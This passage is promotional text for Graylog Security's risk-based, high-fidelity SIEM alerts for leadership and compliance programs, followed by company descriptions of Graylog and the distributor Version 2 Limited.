Senior leadership is responsible for overseeing the organization’s compliance posture and making data-driven decisions about the cybersecurity program. Your risk assessment is the basis of your compliance program. With risk-based alerts, you can align your security and compliance objectives more effectively. Further, leadership needs to understand the program’s strengths and weaknesses to make meaningful decisions about security investments. When you map risk-based alerts to frameworks like MITRE ATT&CK, you gain visibility into potential tooling gaps.

Graylog Security: Risk-Based, High Fidelity Alerts to Mature Your Program

With Graylog Security, you can build risk-based, high-fidelity alerts based on your organization’s unique technology stack and risk profile. Our cloud-native capabilities, intuitive UI, and out-of-the-box content enable you to build the security program you need without paying for the functionalities you don’t use. Using our prebuilt content, you gain immediate value from your logs with search templates, dashboards, correlated alerts, dynamic lookup tables, and more. 

Built with end-users in mind, Graylog’s platform empowers people of all skill levels. You don’t need special skills or engineers to build the risk-based alerts so you can uplevel your security with your current team, reducing labor costs often associated with complex SIEMs. 

About Graylog
At Graylog, our vision is a secure digital world where organizations of all sizes can effectively guard against cyber threats. We’re committed to turning this vision into reality by providing Threat Detection & Response that sets the standard for excellence. Our cloud-native architecture delivers SIEM, API Security, and Enterprise Log Management solutions that are not just efficient and effective—whether hosted by us, on-premises, or in your cloud—but also deliver a fantastic Analyst Experience at the lowest total cost of ownership. We aim to equip security analysts with the best tools for the job, empowering every organization to stand resilient in the ever-evolving cybersecurity landscape.

About Version 2 Limited
Version 2 Digital is one of the most dynamic IT companies in Asia. The company distributes a wide range of IT products across various areas including cyber security, cloud, data protection, end points, infrastructures, system monitoring, storage, networking, business productivity and communication products.

Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, different vertical industries, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.